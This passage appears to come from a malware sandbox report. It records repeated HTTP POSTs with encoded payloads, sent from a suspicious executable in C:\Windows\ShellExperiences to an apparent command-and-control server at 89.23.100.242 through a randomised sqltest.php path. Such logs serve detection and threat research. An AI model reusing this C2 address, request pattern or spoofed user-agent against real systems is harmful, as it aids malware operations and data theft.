                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:55.907960892 CET2544OUTData Raw: 59 5e 43 5f 5b 5a 56 52 58 5b 57 56 50 5e 5b 55 55 5c 5e 58 54 58 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y^C_[ZVRX[WVP^[UU\^XTXQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B.1/?%+;;<=$)(("4U*3+Z+?2=+$:'_!/Y.=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                95192.168.2.45010289.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:56.164052963 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:56.517317057 CET2036OUTData Raw: 59 56 46 53 5e 59 56 50 58 5b 57 56 50 53 5b 52 55 53 5e 52 54 51 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVFS^YVPX[WVPS[RUS^RTQQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'.!/?-_?<]/).+=/<;8Z6'+T(#+)?%%=8^''_!/Y.
                                                                                                Jan 10, 2025 07:58:59.940201998 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:00.072932005 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 3a 0f 34 02 3c 1f 25 2c 29 1c 3a 01 0b 56 2b 1e 24 59 29 03 2f 12 29 0d 2f 56 3a 01 05 57 36 05 0b 59 3c 22 22 51 27 05 3c 53 25 1d 21 59 0c 13 26 5b 28 2a 3d 1d 28 2a 0e 12 29 31 26 41 33 20 2b 5b 24 04 26 0b 37 3c 38 5a 3e 29 39 18 3f 08 31 10 2e 07 0d 04 29 3f 28 11 33 0c 2a 57 0c 1f 26 57 35 31 35 1e 35 0c 36 5c 27 01 28 0c 30 2b 20 1c 26 59 27 10 34 03 23 13 3a 00 3c 58 22 3d 34 11 29 2d 26 1f 23 32 2c 51 29 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:4<%,):V+$Y)/)/V:W6Y<""Q'<S%!Y&[(*=(*)1&A3 +[$&7<8Z>)9?1.)?(3*W&W51556\'(0+ &Y'4#:<X"=4)-&#2,Q), Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                96192.168.2.45010389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:56.284343958 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:56.642354965 CET2544OUTData Raw: 5c 53 46 55 5e 5c 56 54 58 5b 57 56 50 58 5b 52 55 5d 5e 59 54 5c 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \SFU^\VTX[WVPX[RU]^YT\QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B,1+Z?"<6/;<#((8Z!/T(?Y)Y*2'''_!/Y.%
                                                                                                Jan 10, 2025 07:58:57.028199911 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:57.157007933 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:56 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                97192.168.2.45010489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:57.286503077 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:57.642225981 CET2544OUTData Raw: 5c 52 46 50 5e 5e 56 57 58 5b 57 56 50 5d 5b 54 55 5d 5e 5b 54 50 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \RFP^^VWX[WVP][TU]^[TPQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'E,?<[-\?-:"<_(+ "$/U+0 *%-''_!/Y.1
                                                                                                Jan 10, 2025 07:58:58.039999008 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                98192.168.2.45010589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:58.168611050 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:58.517280102 CET2544OUTData Raw: 59 5e 43 50 5e 5b 53 52 58 5b 57 56 50 5d 5b 55 55 50 5e 5d 54 5c 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y^CP^[SRX[WVP][UUP^]T\QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;";?."?4Y/*>-<7"+(3^)=%,^$'_!/Y.1
                                                                                                Jan 10, 2025 07:58:58.905781031 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:59.040857077 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                99192.168.2.45010689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:59.176376104 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:59.533035994 CET2544OUTData Raw: 59 5f 46 54 5e 5b 56 5e 58 5b 57 56 50 5c 5b 51 55 51 5e 5f 54 50 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_FT^[V^X[WVP\[QUQ^_TPQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';"?<=\<&Y,>?[?+((]54*0#>$-,&*'_!/Y.
                                                                                                Jan 10, 2025 07:58:59.979629040 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:00.130094051 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                100192.168.2.45010789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:00.284984112 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:59:00.645905972 CET2544OUTData Raw: 59 57 43 52 5b 5b 56 54 58 5b 57 56 50 5e 5b 55 55 5c 5e 5d 54 59 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YWCR[[VTX[WVP^[UU\^]TYQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,Y<[!]<\,*V(8](+ "* #>/.B$-+$:'_!/Y.=
                                                                                                Jan 10, 2025 07:59:01.049196959 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:01.204114914 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                101192.168.2.45010889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:01.342729092 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:59:01.689182043 CET2544OUTData Raw: 5c 56 46 50 5b 5a 56 57 58 5b 57 56 50 53 5b 50 55 5d 5e 5e 54 5e 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VFP[ZVWX[WVPS[PU]^^T^Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/+\<=Z<& /)-W>=]+5+ 3*<!%-(3'_!/Y.
                                                                                                Jan 10, 2025 07:59:02.188221931 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:02.320224047 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                102192.168.2.45010989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:02.498435020 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:02.845398903 CET2544OUTData Raw: 59 53 43 50 5e 58 53 50 58 5b 57 56 50 5d 5b 54 55 5d 5e 5f 54 5f 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSCP^XSPX[WVP][TU]^_T_QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;1$?-]?6 ,*<>7<$X!+P+?^*<&C1-#0:'_!/Y.1
                                                                                                Jan 10, 2025 07:59:03.245507002 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:03.398781061 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:03 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                103192.168.2.45011089.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:03.516794920 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:03.861011028 CET2544OUTData Raw: 5c 53 43 51 5e 5c 53 57 58 5b 57 56 50 52 5b 53 55 5d 5e 5e 54 5e 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \SCQ^\SWX[WVPR[SU]^^T^Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,'<^?6;/*?[??;#6((#Z)61 $:'_!/Y.
                                                                                                Jan 10, 2025 07:59:04.257208109 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:04.385835886 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                104192.168.2.45011189.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:04.526473999 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:04.876863956 CET2544OUTData Raw: 59 56 43 5f 5e 5c 56 52 58 5b 57 56 50 52 5b 52 55 51 5e 5c 54 5b 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVC_^\VRX[WVPR[RUQ^\T[Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';1'[>.%_<6Z,&(>?)(4#$$?07^*5$=_''_!/Y.


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                105192.168.2.45011289.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:05.085773945 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2012
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:05.439104080 CET2012OUTData Raw: 5c 55 43 5e 5e 5c 56 54 58 5b 57 56 50 59 5b 56 55 50 5e 5d 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UC^^\VTX[WVPY[VUP^]TPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B/++>:?&-:*<.'<+("'*33_>?"F1-<$*'_!/Y.!
                                                                                                Jan 10, 2025 07:59:05.829966068 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:05.958870888 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
